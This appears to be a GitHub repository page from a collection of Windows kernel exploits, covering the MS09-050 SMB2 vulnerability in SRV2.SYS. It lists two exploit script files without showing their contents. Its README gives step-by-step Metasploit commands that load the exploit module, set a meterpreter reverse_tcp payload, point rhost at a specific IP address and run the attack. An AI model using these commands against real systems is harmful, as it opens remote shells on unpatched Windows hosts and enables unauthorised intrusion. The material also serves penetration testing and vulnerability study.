Skip to content

Files

Latest commit

GitmanincGitmaninc
MS09-050
May 16, 2017
52f8e03 · May 16, 2017

History

History
This branch is 168 commits behind SecWiki/windows-kernel-exploits:master.

MS09-050

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
40280.py
40280.py
May 13, 2017
41987.py
41987.py
May 13, 2017
README.md
README.md
May 16, 2017

README.md

MS09-050

This module exploits an out of bounds function table dereference in the SMB 
request validation code of the SRV2.SYS driver included with Windows Vista, 
Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. 
Windows Vista without SP1 does not seem affected by this flaw.

Vulnerability reference:

Usage

msf > search MS09_050
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
msf exploit(ms09_050_smb2_negotiate_func_index) > options
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 110.196.193.102
msf exploit(ms09_050_smb2_negotiate_func_index) > run

load the module within the Metasploit console

msf

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show targets
    ...targets...
msf exploit(ms09_050_smb2_negotiate_func_index) > set TARGET <target-id>
msf exploit(ms09_050_smb2_negotiate_func_index) > show options
    ...show and set options...
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

References

MS09-050漏洞测试
MS09-050 vulnerability